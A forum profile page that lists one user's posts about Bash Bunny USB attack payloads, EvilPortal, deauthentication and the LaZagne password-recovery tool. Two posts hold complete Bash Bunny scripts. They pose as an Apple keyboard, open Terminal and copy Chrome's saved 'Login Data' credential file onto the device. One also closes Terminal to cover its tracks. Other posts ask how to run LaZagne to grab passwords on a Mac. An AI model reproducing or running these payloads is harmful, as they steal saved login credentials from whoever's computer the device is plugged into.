Jump to content

thefragile99

Active Members
  • Content Count

    12
  • Joined

  • Last visited

About thefragile99

  • Rank
    Hackling

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Can someone give me a quick rundown on what this does versus EvilPortal? Is it basically the automation of the deauthentication attack PLUS EvilPortal?
  2. I fixed it - "Application Support" needed two // in Application// Support. Ugh.
  3. Or this: #!/bin/bash LED ATTACK ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 3000 QUACK STRING osascript -e \'tell application \"Terminal\" to do script \"cp -a ~/Library/Application Support/Google/Chrome/Default/. ~/Volumes/BashBunny/loot/sMacAndGrab/\"\' QUACK ENTER LED FINISH
  4. #!/bin/bash LED ATTACK ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 3000 QUACK STRING cp -a ~/Library/Application\ Support/Google/Chrome/Default/Login\ Data /Volumes/BashBunny/loot/sMacAndGrab/; killall Terminal QUACK ENTER LED FINISH
  5. Cool - tried running LaZagne.py on my MBP but I get a 'key3 file not found'
  6. Is there possibly a payload that can launch the Mac version (python) of LaZagne via the Bash?
  7. Just tried password grabber - worked awesome!
  8. Do you have to put laZagne.exe in the root folder?
  9. I've noticed this too with the credential extracting payloads. QuickCreds works fine but the rest not so much. I'll check out the languages section of the FAQ.
×
×
  • Create New...